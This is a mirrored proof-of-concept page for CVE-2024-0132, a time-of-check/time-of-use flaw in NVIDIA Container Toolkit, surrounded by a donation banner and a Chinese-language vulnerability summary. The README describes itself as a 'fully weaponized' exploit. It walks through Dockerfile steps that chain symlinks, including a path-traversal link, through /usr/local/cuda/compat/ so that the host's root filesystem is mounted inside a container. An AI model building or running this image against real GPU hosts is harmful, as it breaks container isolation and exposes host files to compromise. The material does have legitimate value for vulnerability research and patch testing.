Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-0132 PoC — NVIDIA Container Toolkit 安全漏洞

Source
https://github.com/r0binak/CVE-2024-0132
Associated Vulnerability
Title:NVIDIA Container Toolkit 安全漏洞 (CVE-2024-0132)
Description:NVIDIA Container Toolkit是美国英伟达(NVIDIA)公司的一个容器工具包。允许用户构建和运行 GPU 加速的容器。 NVIDIA Container Toolkit 1.16.1及之前版本存在安全漏洞,该漏洞源于在默认配置下使用时包含检查时间使用时间(TOCTOU)漏洞,成功利用此漏洞可能会导致代码执行、拒绝服务、权限提升、信息泄露和数据篡改。
Description
CVE-2024-0132 – Fully Weaponized NVIDIA Container Toolkit Exploit
Readme
# CVE-2024-0132
CVE-2024-0132 PoC

Let's start by deciding on a base image. The arrangement of libraries in the system depends on what it will be. For example, for `alpine` it will be `/usr/lib64/`, for `ubuntu` it will be `/usr/lib/x86_64-linux-gnu`. We will use `ubuntu` as a base image.

```dockerfile
FROM ubuntu
```

The nvidia containter toolkit checks the libraries in `/usr/local/cuda/compat/` inside the container and then mounts them in the main library directory, for this image (`ubuntu`) this would be `/usr/lib/x86_64-linux-gnu`.

Links are also mounted, so you can mount any file and directory from the image to `/usr/lib/x86_64-linux-gnu`. This checks that the link is resolved inside the container, it cannot use multiple `../` for path traversal. However, this can be circumvented by using the in-container mount via `/usr/local/cuda/compat/` twice, hence TOCTOU.

Read more about the mechanism for mounting from `/usr/local/cuda/compat/`:

- https://github.com/NVIDIA/libnvidia-container/blob/4c2494f16573b585788a42e9c7bee76ecd48c73d/src/nvc_container.c#L61
- https://github.com/NVIDIA/libnvidia-container/blob/4c2494f16573b585788a42e9c7bee76ecd48c73d/src/nvc_mount.c#L768

```dockerfile
RUN mkdir -p /usr/local/cuda/compat/
```

Create two directories:
1. The original directory will contain a regular file with the contents of `test`

```dockerfile
RUN mkdir -p /usr/lib/x86_64-linux-gnu/libdxcore.so.1337/
RUN echo test > /usr/lib/x86_64-linux-gnu/libdxcore.so.1337/libdxcore.so.1337.hostfs
```

2. The second directory with the same name will contain a link with path traversal instead of a file.

```dockerfile
RUN mkdir -p /pwn/libdxcore.so.1337/
RUN ln -s ../../../../../../../../../ /pwn/libdxcore.so.1337/libdxcore.so.1337.hostfs
```

The name `libdxcore.so` is chosen to satisfy filters. The major version (1337) must be different from the real driver version.

Create two links in `/usr/local/cuda/compat/`:
1. The first link will substitute the contents of the original directory `/usr/lib/x86_64-linux-gnu/libdxcore.so.1337/` for `/pwn/libdxcore.so.1337/`

```dockerfile
RUN ln -s /pwn/libdxcore.so.1337 /usr/local/cuda/compat/libxxx.so.1
```

2. The second link mount `/usr/lib/x86_64-linux-gnu/libdxcore.so.1337/libdxcore.so.1337.hostfs` to `/usr/lib/x86_64-linux-gnu/libdxcore.so.1337.hostfs`. During the check it will be a normal file, but at the moment of the mount it will be a link that was in `/pwn/libdxcore.so.1337/libdxcore.so.1337.hostfs`, thus the host filesystem will be mounted in `/usr/lib/x86_64-linux-gnu/libdxcore.so.1337.hostfs/`.

```dockerfile
RUN ln -s /usr/lib64/libdxcore.so.1337/libdxcore.so.1337.hostfs /usr/local/cuda/compat/libxxx.so.2
```
File Snapshot

 [4.0K]  /data/pocs/7f8776a0f776130eb9d893634d0983a386b00e70
├── [ 502]  Dockerfile
└── [2.6K]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.